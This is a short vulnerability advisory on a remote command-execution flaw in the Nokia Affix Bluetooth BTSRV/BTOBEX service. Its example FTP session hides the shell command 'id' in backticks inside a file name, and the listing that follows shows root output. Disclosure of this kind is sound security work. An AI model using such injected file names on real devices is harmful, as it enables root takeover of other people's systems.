Nokia Affix BTSRV/BTOBEX Remote Command Execution Vulnerability

Nokia Affix BTSRV/BTOBEX Remote Command Execution Vulnerability

No exploit is required, the following example is available:

ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)
Command complete.